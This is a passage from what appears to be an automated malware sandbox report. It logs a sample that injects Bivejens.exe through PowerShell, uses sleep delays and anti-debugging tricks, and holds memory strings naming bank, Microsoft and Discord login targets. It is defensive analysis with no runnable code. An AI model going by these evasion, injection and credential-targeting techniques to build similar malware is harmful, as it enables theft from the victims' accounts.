        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -596235s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -596110s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -595985s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -595860s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -595735s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -595610s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -595485s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -595360s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -595235s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -595110s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -594985s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -594851s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -594749s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -594626s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -594431s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -594250s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -594141s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -594016s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -593891s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -593782s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe TID: 8168Thread sleep time: -593657s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00402868 LdrInitializeThunk,FindFirstFileW,5_2_00402868
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_004065C7 FindFirstFileW,FindClose,5_2_004065C7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindNextFileW,FindClose,LdrInitializeThunk,LdrInitializeThunk,5_2_00405996
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599657Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599532Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599422Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599313Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599188Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 599063Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598938Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598813Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598703Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598594Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598469Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598360Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598235Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 598110Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597985Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597860Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597735Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597610Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597485Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597360Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597235Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 597110Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596985Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596860Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596735Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596610Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596485Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596360Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596235Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 596110Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595985Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595860Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595735Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595610Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595485Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595360Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595235Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 595110Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594985Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594851Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594749Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594626Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594431Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594250Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594141Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 594016Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 593891Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 593782Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread delayed: delay time: 593657Jump to behavior
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
        Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
        Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001FA6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F750000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
        Source: C:\Users\user\Desktop\TjoY7n65om.exeAPI call chain: ExitProcess graph end nodegraph_0-3727
        Source: C:\Users\user\Desktop\TjoY7n65om.exeAPI call chain: ExitProcess graph end nodegraph_0-3735
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00401941 LdrInitializeThunk,5_2_00401941
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Bivejens.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Bivejens.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Bivejens.exe base: 16F0000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Bivejens.exe "C:\Users\user\AppData\Local\Temp\Bivejens.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
